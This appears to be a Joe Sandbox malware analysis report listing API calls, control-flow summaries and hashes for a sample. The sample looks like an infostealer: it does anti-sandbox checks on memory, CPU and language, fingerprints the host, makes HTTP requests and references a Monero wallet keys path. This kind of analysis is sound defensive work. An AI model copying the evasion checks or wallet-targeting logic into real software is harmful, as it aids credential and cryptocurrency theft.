1078->1072
                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00874839
                    • Part of subcall function 008747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00874849
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • InternetOpenA.WININET(00890DFE,00000001,00000000,00000000,00000000), ref: 008762E1
                  • StrCmpCA.SHLWAPI(?,015DE4A0), ref: 00876303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00876335
                  • HttpOpenRequestA.WININET(00000000,GET,?,015DDD58,00000000,00000000,00400100,00000000), ref: 00876385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008763BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008763D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008763FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0087646D
                  • InternetCloseHandle.WININET(00000000), ref: 008764EF
                  • InternetCloseHandle.WININET(00000000), ref: 008764F9
                  • InternetCloseHandle.WININET(00000000), ref: 00876503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 1b068326fb59985999dc4647695727015c56a99ba0435f877f11a5c9e858da2a
                  • Instruction ID: f004f4f53e5232504655ba58b56c21c2b508801b45eed582323d6fd0d4d6e85a
                  • Opcode Fuzzy Hash: 1b068326fb59985999dc4647695727015c56a99ba0435f877f11a5c9e858da2a
                  • Instruction Fuzzy Hash: 6C712F71A00218ABEF14EBE4DC49BEE7774FB44700F108199F509AB1D5EBB4AA85CF52

                  Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed; function body spans 885510-885ac6 and calls StrCmpCA and Sleep)
                  APIs
                    • Part of subcall function 0088A820: lstrlen.KERNEL32(00874F05,?,?,00874F05,00890DDE), ref: 0088A82B
                    • Part of subcall function 0088A820: lstrcpy.KERNEL32(00890DDE,00000000), ref: 0088A885
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00885644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008856A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00885857
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00885228
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 008852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00885318
                    • Part of subcall function 008852C0: lstrlen.KERNEL32(00000000), ref: 0088532F
                    • Part of subcall function 008852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00885364
                    • Part of subcall function 008852C0: lstrlen.KERNEL32(00000000), ref: 00885383
                    • Part of subcall function 008852C0: lstrlen.KERNEL32(00000000), ref: 008853AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0088578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00885940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00885A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00885A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: b474d22184451e114ac10874c894a0dcc71762f74e21f76d10f5ad687caf6226
                  • Instruction ID: 0bf763147c3e928fd7c118432885c3b2cd9def05516b07a40c1f2ddf128c5c5c
                  • Opcode Fuzzy Hash: b474d22184451e114ac10874c894a0dcc71762f74e21f76d10f5ad687caf6226
                  • Instruction Fuzzy Hash: 71E111719101089ADB1CFBA8DD969ED7378FF54300F508129B506D65D6EF386B0ACBA3

                  Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed; function body spans 8817a0-8819cd and calls StrCmpCA and ExitProcess)
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 008817C5
                  • ExitProcess.KERNEL32 ref: 008817D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: dafb26ef4f09eabc0598e0337a3ed63166086652789dc8ed4ed832ef38c56721
                  • Instruction ID: eec8e0b3051a10884474aeefae7974460478edb427000971f7b0d36a838112cf
                  • Opcode Fuzzy Hash: dafb26ef4f09eabc0598e0337a3ed63166086652789dc8ed4ed832ef38c56721
                  • Instruction Fuzzy Hash: 4C5159B4A00209EFDF04EFE4D958ABE7BB9FF44304F108159E406E7291DB74A952CB62

                  Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed; function body spans 887500-88768e and calls GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA)
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00887542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0088757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0088760A
                  • wsprintfA.USER32 ref: 00887640
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 87ca5ba061a652329c6a7dc23ef0549e2fc37331dda6111445ff243191bcbb1c
                  • Instruction ID: f16159ff6bcd18fc36a25d2b093aa9c4cfa411238a7d2ebaf7ec931c69e0f2aa
                  • Opcode Fuzzy Hash: 87ca5ba061a652329c6a7dc23ef0549e2fc37331dda6111445ff243191bcbb1c
                  • Instruction Fuzzy Hash: F44183B1D04248EBDB10EF98DC45BDEBBB8FF18704F100199F509A7291D778AA44CBA6

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0738), ref: 008898A1
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0840), ref: 008898BA
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D05D0), ref: 008898D2
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D05E8), ref: 008898EA
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0618), ref: 00889903
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D8940), ref: 0088991B
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015C6920), ref: 00889933
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015C69A0), ref: 0088994C
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0660), ref: 00889964
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D06A8), ref: 0088997C
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0558), ref: 00889995
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D06C0), ref: 008899AD
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015C6700), ref: 008899C5
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0708), ref: 008899DE
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 008711D0: ExitProcess.KERNEL32 ref: 00871211
                    • Part of subcall function 00871160: GetSystemInfo.KERNEL32(?), ref: 0087116A
                    • Part of subcall function 00871160: ExitProcess.KERNEL32 ref: 0087117E
                    • Part of subcall function 00871110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0087112B
                    • Part of subcall function 00871110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00871132
                    • Part of subcall function 00871110: ExitProcess.KERNEL32 ref: 00871143
                    • Part of subcall function 00871220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0087123E
                    • Part of subcall function 00871220: ExitProcess.KERNEL32 ref: 00871294
                    • Part of subcall function 00886770: GetUserDefaultLangID.KERNEL32 ref: 00886774
                    • Part of subcall function 00871190: ExitProcess.KERNEL32 ref: 008711C6
                    • Part of subcall function 00887850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008711B7), ref: 00887880
                    • Part of subcall function 00887850: RtlAllocateHeap.NTDLL(00000000), ref: 00887887
                    • Part of subcall function 00887850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0088789F
                    • Part of subcall function 008878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887910
                    • Part of subcall function 008878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00887917
                    • Part of subcall function 008878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0088792F
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015D89B0,?,0089110C,?,00000000,?,00891110,?,00000000,00890AEF), ref: 00886ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00886AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00886AF9
                  • Sleep.KERNEL32(00001770), ref: 00886B04
                  • CloseHandle.KERNEL32(?,00000000,?,015D89B0,?,0089110C,?,00000000,?,00891110,?,00000000,00890AEF), ref: 00886B1A
                  • ExitProcess.KERNEL32 ref: 00886B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2931873225-0
                  • Opcode ID: dc63c0e37c905a9a1242f1a47119529da8264cca6ef2df2a5a68b53499393dd3
                  • Instruction ID: 925faf0a7f17a51dd7498f27c5bce20b580d4af7066849018f7a510d54ff68e1
                  • Opcode Fuzzy Hash: dc63c0e37c905a9a1242f1a47119529da8264cca6ef2df2a5a68b53499393dd3
                  • Instruction Fuzzy Hash: 9031E971904218AAEB08F7E8DC56AAE7778FF14300F504529F112E65D2EF74A946C7A3

                  Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed; nodes span 886aba-886b22 and call OpenEventA, CreateEventA, CloseHandle, Sleep, ExitProcess)
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015D89B0,?,0089110C,?,00000000,?,00891110,?,00000000,00890AEF), ref: 00886ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00886AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00886AF9
                  • Sleep.KERNEL32(00001770), ref: 00886B04
                  • CloseHandle.KERNEL32(?,00000000,?,015D89B0,?,0089110C,?,00000000,?,00891110,?,00000000,00890AEF), ref: 00886B1A
                  • ExitProcess.KERNEL32 ref: 00886B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: a8feea7bbc148f653bed9bb5c338200a89b19f947784236ead596d70aba34df2
                  • Instruction ID: 4448e0958dc79740c07b1c93c0433158e68934dc52f4f4aae967aedb8369dcab
                  • Opcode Fuzzy Hash: a8feea7bbc148f653bed9bb5c338200a89b19f947784236ead596d70aba34df2
                  • Instruction Fuzzy Hash: 1EF03470A44229ABE704FBE09C0ABBE7B34FB24705F104A15F512E15E2EBB15941DBA7

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00874839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00874849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 2e4c6ebf6e1284f32fafe474a81f0776292b492b6a0895e60d34ca5317a3be4e
                  • Instruction ID: da72816c8426b08c005d694421c9d066695ed8e9dca935079484d0ad5d42d2d3
                  • Opcode Fuzzy Hash: 2e4c6ebf6e1284f32fafe474a81f0776292b492b6a0895e60d34ca5317a3be4e
                  • Instruction Fuzzy Hash: 412142B1D00209ABDF14DFA5EC45ADD7B74FB44310F108625F515A72D1DB70660ACF91

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 00876280: InternetOpenA.WININET(00890DFE,00000001,00000000,00000000,00000000), ref: 008762E1
                    • Part of subcall function 00876280: StrCmpCA.SHLWAPI(?,015DE4A0), ref: 00876303
                    • Part of subcall function 00876280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00876335
                    • Part of subcall function 00876280: HttpOpenRequestA.WININET(00000000,GET,?,015DDD58,00000000,00000000,00400100,00000000), ref: 00876385
                    • Part of subcall function 00876280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008763BF
                    • Part of subcall function 00876280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008763D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00885228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 776f853b27803e372aef6aff5dce67e8116b7cc25289123d5b20cb255c88a75a
                  • Instruction ID: 9f37d48334b64a4fa34de2ce712c17123633721bbb2a407c1087499da83d4cfe
                  • Opcode Fuzzy Hash: 776f853b27803e372aef6aff5dce67e8116b7cc25289123d5b20cb255c88a75a
                  • Instruction Fuzzy Hash: 2911DD30910548A6DB18FB68DD96AED7378FF50300F408165F81A965D2EF39AB05C793

                  Control-flow Graph

                  Control-flow graph node list (recovered from the rendered graph; basic-block address ranges, calls and successor edges):
                  • 871220-871247: call 8889b0, GlobalMemoryStatusEx -> 871273-87127a, 871249-871271
                  • 871249-871271: call 88da00 (x2) -> 871281-871285
                  • 871273-87127a -> 871281-871285
                  • 871281-871285 -> 871287, 87129a-87129d
                  • 871287 -> 871292-871294, 871289-871290
                  • 871289-871290 -> 87129a-87129d, 871292-871294
                  • 871292-871294: ExitProcess
                  • 87129a-87129d: function exit
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0087123E
                  • ExitProcess.KERNEL32 ref: 00871294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
